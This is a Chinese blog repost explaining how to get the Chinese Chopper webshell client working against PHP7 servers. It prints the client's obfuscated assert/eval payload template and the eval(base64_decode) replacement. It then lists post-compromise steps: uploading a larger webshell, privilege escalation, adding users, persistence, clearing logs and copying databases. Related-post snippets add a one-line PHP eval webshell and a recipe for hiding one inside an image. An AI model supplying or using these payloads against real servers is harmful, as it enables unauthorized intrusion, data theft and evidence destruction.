菜刀连接一句话木马出现:`Cannot call assert() with string argument dynamically`错误

最新推荐文章于 2021-06-04 22:24:16 发布
最新推荐文章于 2021-06-04 22:24:16 发布
阅读量2.6k 收藏 1
点赞数
文章标签: 数据库 运维 php
原文链接:http://www.cnblogs.com/dotnetcrazy/p/11407505.html
版权

前言

逆天还是上学那会玩渗透的,后来工作后就再也没碰了,所以用的工具还是以前经典款,这不,发现出问题了

问题

如果是PHP5则没有问题,如果是PHP7,会出现:Cannot call assert() with string argument dynamically的提示

1127869-20190825121926624-903638975.png

解决

用谷歌搜了下,发现了这篇解释:https://www.freebuf.com/articles/web/197013.html

1127869-20190825121932099-2132670185.png

知道了本质就简单了,菜刀这个软件之所以经典就是因为它的灵活性很强,修改下配置文件即可

PS:把array_map("ass"."ert",array("ev"."Al(\"\\\$xx%%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('%s'));\");"));改成eval(base64_decode('%s'));即可
1127869-20190825121937738-1056169889.png

这时候文件管理的功能就能使用了,下面就是常规操作了(文件上传下载、大马、提权、建用户、远程连接、权限维持、清日记...)

PS:copy数据库、网站,本地搭建一个和服务器一样的环境,进一步探索与发现~~~

1127869-20190825121942458-494492595.png

附录

菜刀下载:https://github.com/raddyfiy/caidao-official-version

取代菜刀:蚁剑https://github.com/AntSwordProject/AntSword-Loader or Cknifehttps://github.com/Chora10/Cknife

转载于:https://www.cnblogs.com/dotnetcrazy/p/11407505.html

LP890127
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一句php木马制作教程_菜刀无法正常访问一句问题
weixin_35092037的博客
12-21 1771
今天自己搭建了一个php版的xss cookie接收平台。为了图操作上的方便,给自己的web放了一句木马。但是当我打开菜刀连接时,报了500错误,如图想到可能是php版本问题导致这个问题的。查看了一下服务器上的php版本,7.0.33抓包查看菜刀数据: 去掉z0数据访问正常 那么问题点在z0数据了,解密z0数据: 看到解密后的z0数据,一下想到了...
菜刀连接PHP WebShell返回200错误
bloodzer0
06-17 6237
错误详情 WebShell内容: <?php @eval($_POST['cmd']); ?> 错误详情: 在Hackber或BurpSuite中却没有问题: 原因分析 PHP7版本过高,在PHP7中,动态调用一些函数是被禁止的,比如在array_map中调用assert会提示:Warning: Cannot call func_num_args() dynamically in %s on line %d 如果把一句Shell中的@符号去掉,会提示:Cannot call as
动态调用函数时的命令执行对于eval()和assert()的执行问题
Alexhirchi的博客
07-02 3179
前言 在做一道通过反序列化后动态调用函数的题目时,最后获取flag使用assert和phpinfo() 构成的命令可以执行 但eval和phpinfo()无法执行 ,本来以为只是因为assert可以把字符串参数当php代码执行,而eval是只能对合法的php代码可以执行的问题的原因,但这解释总感觉怪怪的,后来查询了一些文档并进行本地测试发现其另有原因。 附上题目中的主要代码: class HelloPhp { public $a; public $b; public func
thinkphp在php7环境下提示Cannot use ‘String’ as class name as it is reserved的解决方法
10-21
主要介绍了thinkphp在php7环境下提示Cannot use ‘String’ as class name as it is reserved的解决方法,涉及thinkPHP针对php7关键字判定的相关底层代码修改技巧,需要的朋友可以参考下
php strtoup,PHP 7 的几处函数安全小变化
weixin_39997443的博客
03-09 223
To Begin With最近在准备 LANCTF,想把环境迁移到 PHP 7,却想到一些 payload 失效了。想着什么时候总结成一个笔记,恰巧在 FB 发现有人写了一篇博文,拜读后结合 CTF 环境整理了一下,总体来说,弃用了较多不安全的使用方式,但运行环境未过多限制时仍可使用。测试环境docker pull php:7.3.3-apachedocker pull php:7.0-apach...
PPK_ASSERT:PPK_ASSERT是一个跨平台的,自包含的C ++断言库
01-30
PPK_ASSERT:PPK_ASSERT是一个跨平台的,自包含的C ++断言库
String.prototype.padStart:String.prototype.padStart的符合ES规范的填充程序
02-21
String.prototype.padStart 符合ES2017规范的String.prototype.padStart填充程序。 如果不可用,请调用其“ shim”方法对String.prototype.padStart进行填充。 该软件包实现了接口。 它可以在ES3支持的环境中工作...
python 错误处理 assert详解
09-17
主要介绍了python 错误处理 assert详解,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
node-deep-equal:节点的assert.deepEqual算法
02-04
深平等Node的assert.deepEqual() algorithm作为独立模块。 这个模块比在try/catch包装assert.deepEqual()约。例var equal = require ( 'deep-equal' ) ;console . dir ( [ equal ( { a : [ 2 , 3 ] , b : [ 4 ] } , ...
菜刀连接图片一句木马
热门推荐
qq_18831583的博客
04-22 2万+
1、先制作图片一句木马: 找好一张图片如”fox.jpg“,并且准备好一句脚本php文件fox.php,在图片所在文件夹打开cmd命令行,执行命令:copy fox.jpg/b+fox.php/a fox1.jpg,生成图片一句文件fox1.jpg 接下来用notepad++打开fox1.php图片,看看一句也没有写入到图片当中,如图,一句已经写入刀图片当中: ...
ctf 命令执行总结
njqfb的博客
06-04 2751
命令执行绕过总结 linux系统查看文件命令 more 一页一页的显示文件内容 less 和more类似 head 只显示头几行 tail 只显示最后几行 nl 显示时还输出行号 tailf cat 由第一行开始显示内容,并将所有内容输出 tac 从最后一行倒序显示内容,并将所有内容输出 od 以二进制的方式读取内容 vi 编辑文件 vim 编辑文件,是vi的升级版 sort 将以默认的方式将文本文件的第一列以ASCI
远程桌面连接出现身份验证错误 要求函数不受支持
LP890127的博客
09-23 194
打开组策略 如图设置一下即可 参考: https://support.microsoft.com/zh-cn/help/4093492/credssp-updates-for-cve-2018-0886-march-13-2018 WinServer2012 R2忘记密码的解决方案+远程连接另一种莫名其妙故障 http://www.cnblogs.com/dunitian/p/74...
CPP相关的常见错误(更新ing)
LP890127的博客
01-28 488
01.只允许在C99模式下使用 for 循环初始化申明 解决:指定下即可 gcc -o xxx -std=c99 02. 转载于:https://www.cnblogs.com/dotnetcrazy/p/8371255.html
PHP特性整合(PHP5.X到PHP7.1.x)
风.foxwho(神秘狐)
10-01 1万+
1PHP7 已经出来1年了,PHP7.1也即将和大家见面,这么多好的特性,好的方法,为什么不使用呢,也希望PHP越来越好。 在这里整理 PHP 5.1 ,PHP5.2,PHP5.3,PHP5.4,PHP5.5,PHP5.6 ,PHP7,PHP7.1 所有新特性,已备大家学习及使用
CentOS安装Python3.7
LP890127的博客
07-24 114
vscode设置python3.7调试环境:https://www.cnblogs.com/dotnetcrazy/p/9095793.html 先下载一下压缩包(FTP传也一样):weget https://www.python.org/ftp/python/3.7.0/Python-3.7.0.tar.xz 目前最新:https://www.python.org/ftp/pyth...
记一次Net软件逆向的过程(经典)
LP890127的博客
06-21 730
查壳 1.先看下目录结构: 2.查下,是什么语言 ==> Net的,那不用说了,肯定能破解(毕竟是老本行嘛~) 混淆与反混淆 3.dnSpy打开后发现很多变量是乱码 4.用de4dot跑一波 5.生成了一个反混淆过的exe 程序调试 6.改名后打开,乱码问题解决 下断 PS:刚开始你单步跟着后面走走`F11`,遇到系统方法就`F10`跳过...
fatal error C1083: Cannot open include file: 'assert.h': No such file or directory怎么解决
最新发布
06-01
这个错误通常是因为编译器找不到所需的头文件 "assert.h"。为了解决这个问题,你可以尝试以下几个方法: 1. 确保你的编译器的路径中包含了正确的头文件目录。 2. 检查你的代码中是否包含了正确的头文件。在这个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值